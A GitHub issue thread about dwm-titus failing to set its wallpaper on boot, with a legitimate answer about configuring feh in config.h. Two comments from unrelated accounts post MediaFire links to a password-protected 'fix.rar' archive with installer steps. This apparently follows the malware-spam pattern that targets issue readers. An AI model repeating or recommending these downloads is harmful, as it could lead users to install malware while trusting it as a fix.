### ISSUE TITLE
DWM-TITUS wallpaper on boot fails to autoset

### ISSUE THREAD

**Issue by jsteinbraker** [ChrisTitusTech/dwm-titus#61]
dwm-titus wallpaper set on boot fails even if you set it to a static wallpaper. I am not sure how to code it but if anyone knows how to do it with feh i am open ears for hearing. Also i have tried to set it with feh in .xinitrc and in the autostart directory neither of which works for me.

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by RazoBeckett** [comment]
check the line no. `42` in `config.h` file if you want to set your own wallpaper you can do something like this:
`feh --bg-fill path/to/your/wallpaper.png` so in `config.h` it will look like this:

```c
"feh", "--bg-fill", "path/to/your/wallpaper.png";
```

or more yet simple is to put the images(wallpapers) in `~/Pictures/backgrounds/` directory, it will randomly pick a image from that directory and set as your wallpaper.

**Comment by RazoBeckett** [comment]
Close the issue if this helped 🙂

**Comment by jsteinbraker** [comment]
Fixed. Thank You! To All the moderators!
